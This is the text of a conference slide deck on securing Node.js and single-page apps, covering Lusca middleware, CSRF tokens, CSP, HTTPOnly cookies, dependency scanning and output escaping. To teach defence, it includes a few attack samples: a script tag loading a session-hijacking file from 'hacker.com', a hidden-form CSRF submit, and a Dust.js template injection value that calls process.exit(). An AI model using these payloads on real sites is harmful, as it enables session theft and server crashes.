Tweet
Tweet

Slide 1

Slide 1 text

Securing Your Node.js & Single Page Apps

Slide 2

Slide 2 text

@mark_stuart @mstuart

Slide 3

Slide 3 text

How are you using JavaScript?

Slide 4

Slide 4 text

So, why security?

Slide 5

Slide 5 text

No content

Slide 6

Slide 6 text

No content

Slide 7

Slide 7 text

No content

Slide 8

Slide 8 text

Not just PayPal, but your company too.

Slide 9

Slide 9 text

No content

Slide 10

Slide 10 text

No content

Slide 11

Slide 11 text

No content

Slide 12

Slide 12 text

Web Security State of the Union 2014

Slide 13

Slide 13 text

Same vulnerabilities. Nothing new.

Slide 14

Slide 14 text

ok cya.

Slide 15

Slide 15 text

Same vulnerabilities. Different beast.

Slide 16

Slide 16 text

Node

Slide 17

Slide 17 text

Know what you require() Rule #1 ! ! !

Slide 18

Slide 18 text

npm has ~80,000 modules

Slide 19

Slide 19 text

modulecounts.com

Slide 20

Slide 20 text

Really great developer ecosystem, except…

Slide 21

Slide 21 text

Anyone can publish anything

Slide 22

Slide 22 text

Node is still JavaScript Rule #2 ! ! !

Slide 23

Slide 23 text

Client-side vulnerabilities still exist on the server-side

Slide 24

Slide 24 text

Eval is still evil

Slide 25

Slide 25 text

Do not run as root Rule #2 ! ! !

Slide 26

Slide 26 text

Running as root is wreckless

Slide 27

Slide 27 text

If you’re compromised, terrible things could happen

Slide 28

Slide 28 text

Steal SSH keys or configs Read/write files Execute binaries Cause server to hang Tamper with routes Inject XSS Steal session data Crash server

Slide 29

Slide 29 text

Steal SSH keys or configs Read/write files Execute binaries Cause server to hang Tamper with routes Inject XSS Steal session data Crash server

Slide 30

Slide 30 text

Steal SSH keys or configs Read/write files Execute binaries Cause server to hang Tamper with routes Inject XSS Steal session data Crash server

Slide 31

Slide 31 text

Steal SSH keys or configs Read/write files Execute binaries Cause server to hang Tamper with routes Inject XSS Steal session data Crash server

Slide 32

Slide 32 text

Steal SSH keys or configs Read/write files Execute binaries Cause server to hang Tamper with routes Inject XSS Steal session data Crash server

Slide 33

Slide 33 text

Steal SSH keys or configs Read/write files Execute binaries Cause server to hang Tamper with routes Inject XSS Steal session data Crash server

Slide 34

Slide 34 text

Steal SSH keys or configs Read/write files Execute binaries Cause server to hang Tamper with routes Inject XSS Steal session data Crash server

Slide 35

Slide 35 text

Steal SSH keys or configs Read/write files Execute binaries Cause server to hang Tamper with routes Inject XSS Steal session data Crash server

Slide 36

Slide 36 text

Ok, so if not root, then what?

Slide 37

Slide 37 text

Create a user for node with restricted permissions ! (plenty of docs out there)

Slide 38

Slide 38 text

Create a user for node with restricted permissions ! (plenty of docs out there)

Slide 39

Slide 39 text

Create a user for node with restricted permissions ! (plenty of docs out there)

Slide 40

Slide 40 text

Use good security defaults Rule #3 ! ! !

Slide 41

Slide 41 text

Node is a set of barebones modules

Slide 42

Slide 42 text

HTTP OS DNS TLS/SSL Path Process UDP URL File System Crypto Buffer

Slide 43

Slide 43 text

Express is a barebones framework

Slide 44

Slide 44 text

Express does very little to secure your app

Slide 45

Slide 45 text

But, that’s okay!

Slide 46

Slide 46 text

… drum roll …

Slide 47

Slide 47 text

No content

Slide 48

Slide 48 text

Enterprise-grade Express "

Slide 49

Slide 49 text

Lusca App Security module for Express

Slide 50

Slide 50 text

var express = require(‘express’), app = express(), lusca = require(‘lusca’);

Slide 51

Slide 51 text

app.use(lusca.csrf()); app.use(lusca.csp({ /* ... */ })); app.use(lusca.hsts({ maxAge: 31536000 }); app.use(lusca.xframe('SAMEORIGIN')); app.use(lusca.p3p('ABCDEF')); app.use(lusca.xssProtection(true);

Slide 52

Slide 52 text

Pardon the interruption

Slide 53

Slide 53 text

CSRF

Slide 54

Slide 54 text

Trick victim’s browser into making malicious requests CSRF

Slide 55

Slide 55 text

All you need is a valid cookie CSRF

Slide 56

Slide 56 text

CSRF # Victim yoursite.com " Cookie

Slide 57

Slide 57 text

CSRF # Victim hackedsite.com Cookie yoursite.com

Slide 58

Slide 58 text

CSRF ! document.forms.someHiddenForm.submit();

Slide 59

Slide 59 text

It’s a simple HTTP request. CSRF

Slide 60

Slide 60 text

If only we had a way to ensure requests were legitimate… CSRF

Slide 61

Slide 61 text

lusca.csrf();

Slide 62

Slide 62 text

Token synchronizer pattern lusca.csrf();

Slide 63

Slide 63 text

1. Creates a random token (using some crazy crypto libraries) lusca.csrf();

Slide 64

Slide 64 text

2. Adds token to res.locals lusca.csrf();

Slide 65

Slide 65 text

3. Dump token on the page lusca.csrf();

Slide 66

Slide 66 text

4. Send token with every POST, PUT, DELETE request lusca.csrf();

Slide 67

Slide 67 text

$.ajaxPrefilter(function(options, _, xhr) { if (!xhr.crossDomain) { xhr.setRequestHeader('X-CSRF-Token', csrfToken); } }); lusca.csrf();

Slide 68

Slide 68 text

5. Verify token is correct, otherwise return 403. lusca.csrf();

Slide 69

Slide 69 text

CSP

Slide 70

Slide 70 text

CSP is really awesome.

Slide 71

Slide 71 text

It’s basically a whitelist.

Slide 72

Slide 72 text

Content-Security-Policy: default-src 'self' https://*.your-cdn.com; script-src 'self' https://*.your-cdn.com; img-src https://*.your-cdn.com data:; object-src 'self'; font-src 'self' https://*.googlefonts.com; connect-src … frame-src … style-src … media-src …

Slide 73

Slide 73 text

No content

Slide 74

Slide 74 text

lusca.csp( { /* … */ } );

Slide 75

Slide 75 text

lusca.csp({ "default-src": "'self' https://*.your-cdn.com”, "script-src": “'self' https://*.your-cdn.com”, "img-src": “https://*.your-cdn.com data:”, "font-src": “‘self’", “report-uri”: “https://mysite.com/cspReporter” });

Slide 76

Slide 76 text

“report-uri”: “https://mysite.com/cspReporter”

Slide 77

Slide 77 text

lusca.hsts();

Slide 78

Slide 78 text

lusca.hsts(); Ensures HTTPS traffic

Slide 79

Slide 79 text

Helps prevent MITM attacks lusca.hsts();

Slide 80

Slide 80 text

lusca.xframe();

Slide 81

Slide 81 text

lusca.xframe(); Prevent others from loading your app in an iframe

Slide 82

Slide 82 text

No content

Slide 83

Slide 83 text

app.use(lusca.xssProtection()); app.use(lusca.p3p());

Slide 84

Slide 84 text

app.use(lusca.csrf()); app.use(lusca.csp({ /* ... */ })); app.use(lusca.hsts({ maxAge: 31536000 }); app.use(lusca.xframe('SAMEORIGIN')); app.use(lusca.p3p('ABCDEF')); app.use(lusca.xssProtection(true);

Slide 85

Slide 85 text

Okay, now where were we?

Slide 86

Slide 86 text

HTTPOnly cookies

Slide 87

Slide 87 text

Prevents session hijacking HTTPOnly cookies

Slide 88

Slide 88 text

app.use(express.session({ secret: ‘0m6!s3cr37’, cookie: { httpOnly: true, secure: true }, })); HTTPOnly cookies

Slide 89

Slide 89 text

Set-Cookie:! connect.sid=%3AbzLqvcp7DnQJMaLAPmJ7p; ! Path=/; Expires=Wed, 21 May 2014 18:26:44 GMT; HttpOnly HTTPOnly cookies

Slide 90

Slide 90 text

Handle errors, or crash. Rule #4 ! ! !

Slide 91

Slide 91 text

! Wed, 21 May 2014 18:49:00 GMT ! uncaughtException Object # has no method ‘forEach'! ! TypeError: Object # has no method 'forEach'! at module.exports.fetchSettings (/Users/marstuart/oddjob/helpers.js:174:18)! ! Process finished with exit code 1!

Slide 92

Slide 92 text

Basically, a DOS attack

Slide 93

Slide 93 text

Catch them or restart

Slide 94

Slide 94 text

Scan for vulnerable modules Rule #6 ! ! !

Slide 95

Slide 95 text

Node Security Project http://nodesecurity.io

Slide 96

Slide 96 text

Audit all modules in npm

Slide 97

Slide 97 text

Contribute patches

Slide 98

Slide 98 text

No content

Slide 99

Slide 99 text

Educate others

Slide 100

Slide 100 text

npm install grunt-nsp-package --save-dev grunt validate-package

Slide 101

Slide 101 text

No content

Slide 102

Slide 102 text

Define custom rules ESLint

Slide 103

Slide 103 text

Security can be automated

Slide 104

Slide 104 text

Make it a part of your CI

Slide 105

Slide 105 text

Update your dependencies Rule #7 ! ! !

Slide 106

Slide 106 text

Add a badge to your README

Slide 107

Slide 107 text

No content

Slide 108

Slide 108 text

No content

Slide 109

Slide 109 text

david-dm.org

Slide 110

Slide 110 text

Let’s recap…

Slide 111

Slide 111 text

1. Know what you require() 2. Node is still JavaScript 3. Do not run as root 3. Use good security defaults 4. Security can be automated, too!

Slide 112

Slide 112 text

Client-side JS

Slide 113

Slide 113 text

Escape everything. Rule #1 ! ! !

Slide 114

Slide 114 text

Content injection

Slide 115

Slide 115 text

XSS sucks. It’s everywhere.

Slide 116

Slide 116 text

<script src='http://hacker.com/ sessionhijacker.js'></script>

Slide 117

Slide 117 text

User input and backend data

Slide 118

Slide 118 text

Don’t trust backend services to escape properly

Slide 119

Slide 119 text

Persistent or Stored XSS

Slide 120

Slide 120 text

# Attacker yoursite.com PUT /account/edit { firstName: ‘…’ } # Victim # Victim <script>… GET /addressBook … GET /addressBook yoursite.com yoursite.com

Slide 121

Slide 121 text

Case Study: TweetDeck worm

Slide 122

Slide 122 text

TweetDeck worm

Slide 123

Slide 123 text

TweetDeck worm

Slide 124

Slide 124 text

Just one tweet. TweetDeck worm

Slide 125

Slide 125 text

Just two weeks ago. TweetDeck worm

Slide 126

Slide 126 text

… So how do I escape?

Slide 127

Slide 127 text

DOMPurify and Google Caja

Slide 128

Slide 128 text

DOMPurify Plain ol’ JavaScript var clean = DOMPurify.sanitize(dirty);

Slide 129

Slide 129 text

require(['dompurify'], function(DOMPurify) { var clean = DOMPurify.sanitize(dirty); }); DOMPurify RequireJS / AMD

Slide 130

Slide 130 text

var DOMPurify = require(‘dompurify’); var clean = DOMPurify.sanitize(dirty); DOMPurify Node npm install dompurify

Slide 131

Slide 131 text

Know your templating library. Rule #2 ! ! !

Slide 132

Slide 132 text

Use it properly.

Slide 133

Slide 133 text

Underscore templates

Slide 134

Slide 134 text

” /> ” />

Slide 135

Slide 135 text

Dust.js templates

Slide 136

Slide 136 text

{@if cond=“{cardType} === ‘VISA’”}
  • {/if}

    Slide 137

    Slide 137 text

    {@if cond=“{zipCode} === {defaultZipCode}”}
  • {/if} { “zipCode”: “\\”, “defaultZipCode”: “);process.exit();//“ }

    Slide 138

    Slide 138 text

    Your server crashed. $

    Slide 139

    Slide 139 text

    Upgrade your front-end dependencies. Rule #3 ! ! !

    Slide 140

    Slide 140 text

    Retire.js

    Slide 141

    Slide 141 text

    jQuery <1.9.0 jQuery Mobile <1.0.1 Backbone <0.5.0 Angular <1.2.0 Handlebars <1.0.0 YUI <3.5.0 Ember <1.3.0 Mustache <0.3.1

    Slide 142

    Slide 142 text

    Running "retire:jsPath" (retire) task! ! >> test-files/jquery-1.6.js! >> ↳ jquery 1.6 has known vulnerabilities: http://web.nvd.nist.gov/view/ vuln/detail?vulnId=CVE-2011-4969! ! >> Aborted due to warnings. npm install grunt-retire --save-dev grunt retire

    Slide 143

    Slide 143 text

    Automate it!

    Slide 144

    Slide 144 text

    C’mon, it’s 1 line.

    Slide 145

    Slide 145 text

    Rules of Thumb

    Slide 146

    Slide 146 text

    No matter what you do, someone will always find a way in

    Slide 147

    Slide 147 text

    But, you’ll get 80% there if you…

    Slide 148

    Slide 148 text

    Choose libraries with good security defaults. ! ! !

    Slide 149

    Slide 149 text

    Sanitize data coming in and going out. ! ! !

    Slide 150

    Slide 150 text

    Update your dependencies! ! ! !

    Slide 151

    Slide 151 text

    Automate security, too. ! ! !

    Slide 152

    Slide 152 text

    Ok.

    Slide 153

    Slide 153 text

    Ok. so,

    Slide 154

    Slide 154 text

    Ok. so, listen…

    Slide 155

    Slide 155 text

    Node is awesome.

    Slide 156

    Slide 156 text

    It’s enterprise ready.

    Slide 157

    Slide 157 text

    We just need to write better, more secure apps.

    Slide 158

    Slide 158 text

    thanks!

    Slide 159

    Slide 159 text

    We’re hiring! (we have an office in Berlin, too!)

    Slide 160

    Slide 160 text

    mark stuart @mark_stuart @mstuart

    Slide 161

    Slide 161 text

    Links https://github.com/nodesecurity/grunt-nsp-package https://github.com/bekk/grunt-retire https://nodesecurity.io/ https://github.com/evilpacket/helmet http://krakenjs.com/ https://github.com/krakenjs/lusca https://david-dm.org/ https://www.owasp.org/index.php/Cross-Site